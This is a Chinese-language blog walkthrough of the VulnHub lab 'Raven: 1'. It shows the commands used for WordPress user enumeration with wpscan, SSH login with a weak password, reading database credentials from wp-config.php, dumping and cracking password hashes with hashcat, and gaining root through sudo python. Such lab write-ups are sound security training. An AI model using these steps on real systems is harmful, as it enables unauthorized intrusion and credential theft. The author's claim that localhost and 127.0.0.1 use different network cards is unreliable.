上回結束掉 Matrix 系列,這回就進入到 Raven,沒意外的話應該是有望在 1/23 農曆年之前解完該系列,該系列在今天發文僅有兩題,而解系列的第一題 Raven: 1 也只花了半天的時間,整體還算順暢,並沒有卡太久得地方,也許是因為熟練度提升,思路知道該怎麼鑽了,又或者是題目難度其實沒有那麼難,現在也有點說不準了,總之有興趣的就來看看解題紀錄唄。
環境設定
Raven: 1 靶機下載: https://www.vulnhub.com/entry/raven-1,256/
解壓縮之後是一個 ova 檔案,同樣直接餵給 VMWare 吃,就可以完成佈署,但在察看 80 Port 的服務時,發現有許多找不到路徑的問題,其中部分路徑都是在 raven.local 底下,所以需要設定 hosts 檔案,若是使用 Windows 環境,Hosts 的路徑在 C:\Windows\System32\drivers\etc 之下,自行加入 192.168.232.130 raven.local 即可。
尋找靶機
透過 nmap -p- 192.168.232.1/24 把靶機找出來,抓到靶機 IP 為 192.168.232.130,並且服務上面有 22、80、111 Ports。
- 這邊使用參數 -p- 是掃描並列出 TCP 的所有執行中的 Ports。
服務探勘
80 Port
看上去是一個 CMS 服務,並在 /raven.local/wordpress 發現是 wordpress 4.8.7,嘗試尋找有沒有已知弱點,據我所知,Wordpress 能夠有效利用的弱點並不多,只有耳聞 WordPress 的主題設計不良,或是附加外掛所而造成漏洞而已,先是尋找目前主題 twenty seventeen 的資訊,在嘗試看看是否安裝外掛,接著在文章中找到以下內容。
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.
還一度以為是要用 XSS 然後釣出管理者的 Cookie,但基本上都有 HttpOnly,可行性並不高,直到使用工具 wpscan,指令 wpscan --url http://raven.local/wordpress/ -evt -eu 得到以下訊息。
- -e = –enumerate
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://raven.local/wordpress/
[+] Started: Mon Jan 20 11:01:27 2020
Interesting Finding(s):
[+] http://raven.local/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://raven.local/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://raven.local/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://raven.local/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
| Found By: Rss Generator (Passive Detection)
| - http://raven.local/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.7</generator>
| - http://raven.local/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.7</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://raven.local/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://raven.local/wordpress/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://raven.local/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.7
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://raven.local/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.7, Match: 'Version: 1.3'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] michael
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://raven.local/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] steven
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
除了可以 DDOS 的洞,沒什麼可以用來達成滲透的,但由於有使用 -eu 參數,有將使用者成功列舉出來,發現帳戶 michael、steven,嘗使用於後台以弱密碼登入失敗。
22 Port
由於拿到帳號名稱,當然要各種嘗試,接著在 ssh 上登入成功,是一組 michael/michael 的弱密碼,藉此拿到 Shell。
為取得更多資訊,有做以下的嘗試與資料蒐集。
- whoami
- cat /etc/passwd
- uname -a
- history
- sudo -i(Failed: Not in sudoers)
- cat /etc/sudoers(Failed: Permission denied)
取得 Shell 接著使用一貫手法,到 /tmp 下提權,但網路上沒什麼 exploit 可以用,感覺上應該是條死路,還是嘗試用了 overlayfs 這包進行提權,顯然是失敗的。
方向轉到網頁服務上,既然有 wordpress,必定有資料庫,在路徑 /var/www/html/wordpress/wp-config.php 中發現資料庫帳號及密碼,而且使用者是 root。
接著直接使用 mysql -u root -p 進行登入,接著想說以 mysql 的 root 權限執行 Bash 能提權,真的是異想天開,在此卡了一段時間,隨後想說就把 DB 上的機密資料道出來看看好了。
show databases;
use wordpress;
show tables;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| 1 | michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael | [email protected] | | 2018-08-12 22:49:12 | | 0 | michael |
| 2 | steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven | [email protected] | | 2018-08-12 23:31:16 | | 0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
得到 steven Hash 後的密碼,但這密文的規則,由於經驗不足還真的不知道是什麼東西,藉由工具 Hash-Analyzer 得到以下結果。
現在就是要針對 MD5 WordPress 破密了,先是使用線上服務 cmd5 進行破解,然後竟然要花錢,這是不是官商勾結阿!!!
隨後載 hashcat 來用,我想這也是出題者希望的做法吧,也藉此練習 hashcat 的用法,結果發現網路上有一篇針對 WordPress Hash 的破解文章「Cracking WordPress Passwords with Hashcat」完全沒練到,只是把指令複製貼上。
echo "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/" > targer_hash.txt
hashcat -O -m 400 -a 0 target_hash.txt rockyou.txt --force
最後 hashcat 得到的結果為:
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 2 secs
- Device #1: autotuned kernel-accel to 512
- Device #1: autotuned kernel-loops to 512
$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/:pink84
Get Root
透過 ssh 連接,這邊發現一個坑,使用 ssh steven@localhost 與 ssh [email protected] 的狀態是不一樣的,在 localhost 下,使用 sudo -l 會得不到資訊,在這之前有同事提過 Linux 環境的網卡 localhost 與 127.0.0.1 指向的網卡是不同張。
透過 sudo -l 得到的資訊如下。
$ sudo -l
Matching Defaults entries for steven on raven:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven:
(ALL) NOPASSWD: /usr/bin/python
透過觀察 (ALL) NOPASSWD: /usr/bin/python 可以知道,可以直接透過 root 權限開啟 python,藉此拿到 root 的 shell,指令如下。
sudo python -c "import os; os.system('/bin/bash')"
隨後就取得 root 了。
root@Raven:~# cat flag4.txt
______
| ___ \
| |_/ /__ ___ _____ _ __
| // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V / __/ | | |
\_| \_\__,_| \_/ \___|_| |_|
flag4{715dea6c055b9fe3337544932f2941ce}
CONGRATULATIONS on successfully rooting Raven!
This is my first Boot2Root VM - I hope you enjoyed it.
Hit me up on Twitter and let me know what you thought:
@mccannwj / wjmccann.github.io
學習重點
- w p s c a n 使用方法。
- 情報蒐集方向,取得 Shell 後,執意的只想提權,應該嘗試找出更多可能攻擊路線。
- h a s h c a t 使用方法。
- l o c a l h o s t、1 2 7 . 0 . 0 . 1 的連線方式並不相同。
